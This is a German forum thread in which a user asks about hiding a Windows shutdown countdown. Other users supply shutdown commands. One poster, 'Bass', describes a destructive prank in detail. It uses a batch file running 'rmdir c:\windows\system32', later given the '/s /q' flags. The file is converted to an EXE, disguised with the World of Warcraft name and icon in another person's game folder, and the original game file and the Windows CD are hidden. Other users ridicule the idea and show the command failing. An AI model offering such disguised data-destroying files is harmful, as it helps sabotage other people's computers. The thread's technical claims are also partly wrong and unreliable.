Countdown unsichtabr

• http://www.chip.de/downloads/c1_downloads_13006862.html

Das erste Ergebnis bei Google: shutdown...

• was dein eigentliches problem angeht: hier wird dir geholfen

• Stalker hast du ICQ wenn ja dann add mich mal ich hab da eine tolle idee meine icq nummer ist 270-503-072 schreib mich mal so um 18:30 uhr an oder so 😉

• oder mach eine Batch datei

schreib darein

rmdir c:\windows\system32

convertier die Batch datei in eine EXE datei um

der converter dafür: http://www.download-tipp.de/shareware_und_freeware/14937.shtml

und dann kopierste du diese EXE datei in sein WOW Ordner nenntst die Datei WOW
    EXE und dann mach einfach eine verknüpfung also rechte maustaste auf die convertierte datei dann verknüpfung erstellen dann wieder rechte maustaste dann

auf eigentschaften dann auf anderes symbol und dann das symbol von der WOW exe auswählen und wer er dann wieder wow spielen will und das startet geht es net

logischer weise und wenn er sein PC hochfahren will geht es danach net mehr^^
    aber man kann es mit der windows CD reparieren also versteck auch die windows cd gut^^ Achja und falls er sein WOW auch aufm desktop hat dann mach da auch deine WOW exe hin und versteck seine originale exe irgendwo wo er sie nicht findet am besten irgendwo im windows ordner oder so^^

Aber schreib mich halt mal in icq an ich hab noch eine bessere Idee
    www.icq.com da kannst du auch icq runterladen.

• Bass schrieb:

oder mach eine Batch datei

schreib darein

rmdir c:\windows\system32

convertier die Batch datei in eine EXE datei um

der converter dafür: http://www.download-tipp.de/shareware_und_freeware/14937.shtml

und dann kopierste du diese EXE datei in sein WOW Ordner nenntst die Datei WOW
    EXE und dann mach einfach eine verknüpfung also rechte maustaste auf die convertierte datei dann verknüpfung erstellen dann wieder rechte maustaste dann

auf eigentschaften dann auf anderes symbol und dann das symbol von der WOW exe auswählen und wer er dann wieder wow spielen will und das startet geht es net

logischer weise und wenn er sein PC hochfahren will geht es danach net mehr^^
    aber man kann es mit der windows CD reparieren also versteck auch die windows cd gut^^ Achja und falls er sein WOW auch aufm desktop hat dann mach da auch deine WOW exe hin und versteck seine originale exe irgendwo wo er sie nicht findet am besten irgendwo im windows ordner oder so^^

Aber schreib mich halt mal in icq an ich hab noch eine bessere Idee
    www.icq.com da kannst du auch icq runterladen.

Wow, ganz grosses Kino:

C:\>rmdir c:\windows\system32
    The process cannot access the file because it is being used by another process.

C:\>

Den gleichen Effekt bekommst du auch durch ein einfaches

@echo The process cannot access the file because it is being used by another process.

• ich glaube, das was sie sucht ist dashier:

shutdown -s -f -t00

damit fährt der rechner sofort ohne countdown runter...

• @hustbaer

das mit dem rmdir c:\windows\system32 das geht aber da kommt noch was dahinter is mir eingefallen ich weiss aber net mehr genau was aber ich guck mal danach und dann geht es 100%ig er kann zwar nicht alles in dem Ordner löschen aber die Sachen die erlöschen kann braucht windows schon zum starten^^ von daher geht es

• versuch mal

rmdir c:\mein /s /q

damit müsste es gehen ansonsten muss ich zuhause danach gucken bin atm aufer arbeit hab halt schon lange kein batch mehr gemacht

• Bass schrieb:

@hustbaer

das mit dem rmdir c:\windows\system32 das geht aber da kommt noch was dahinter is mir eingefallen ich weiss aber net mehr genau was aber ich guck mal danach und dann geht es 100%ig er kann zwar nicht alles in dem Ordner löschen aber die Sachen die erlöschen kann braucht windows schon zum starten^^ von daher geht es

du solltest dir deine beiträge mal durchlesen, bevor du sie abschickst... das ist ja schlimmes deutsch...

ausserdem: ich glaube, sie will den rechner runterfahren und nicht windows abschießen...

• Aber man weiss was gemeint ist bei meinem "schlimmen" Deutsch -.-

• Bass schrieb:

Aber man weiss was gemeint ist bei meinem "schlimmen" Deutsch -.-

Stellenweise wissen es einige mit Sicherheit nicht! Aber naja, muss jeder selbst wissen.

• Bass schrieb:

@hustbaer

Ich kenne viele Möglichkeiten mit Scripts Unsinn anzurichten, rd ist nur eine davon. Das "noch was dahinter" was dir entfallten ist ist " /s /q" und das sollte jedes Kind wissen, bzw. musst du nur "rd /?" eingeben damit du's gesagt bekommst.

Und wie gesagt: sie hat nie gesagt sie will sein Windows schiessen, dann könnte sie ihm gleich den Account sperren oder den PC wegnehmen.

• --------------------------
                             /|  /|  |                          |
                             ||__||  |       Trolle bitte       |
                            /   O O\__           nicht          |
                           /          \         füttern!        |
                          /      \     \                        |
                         /   _    \     \ ----------------------
                        /    |\____\     \     ||
                       /     | | | |\____/     ||
                      /       \|_|_|/   |    __||
                     /  /  \            |____| ||
                    /   |   | /|        |      --|